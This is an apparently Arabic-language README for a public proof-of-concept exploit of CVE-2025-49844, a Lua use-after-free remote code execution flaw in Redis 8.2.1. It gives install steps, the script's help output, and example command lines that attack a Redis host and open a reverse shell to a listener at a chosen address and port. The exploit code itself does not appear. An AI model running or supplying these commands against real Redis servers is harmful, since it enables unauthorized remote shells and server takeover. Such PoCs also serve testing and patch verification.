
CVE-2025-49844
الأصل uv POC: https://github.com/saneki/cve-2025-49844
PoC يوفر شل عكسي.
pip3 install -r requirements.txt
python3 CVE-2025-49844.py -h
usage: CVE-2025-49844.py [-h] [-H HOST] [-P PORT] [-a PASSWORD] [-l HOST] [-p PORT]
CVE-2025-49844 إثبات المفهوم — Redis 8.2.1 Lua UAF RCE (شل عكسي)
options:
-h, --help عرض رسالة المساعدة هذه والخروج
-H HOST, --redis-host HOST
خادم Redis المضيف (الافتراضي: 127.0.0.1)
-P PORT, --redis-port PORT
منفذ خادم Redis (الافتراضي: 6379)
-a PASSWORD, --auth PASSWORD
كلمة مرور Redis (إذا لزم الأمر)
-l HOST, --host HOST مضيف المستمع (الافتراضي: 127.0.0.1)
-p PORT, --port PORT منفذ المستمع (الافتراضي: 4444)
أمثلة:
CVE-2025-49844.py -H 10.0.0.1 -l 192.168.1.10 -p 4444
CVE-2025-49844.py -H 10.0.0.1 -P 6380 -a secretpass -l 192.168.1.10 -p 4444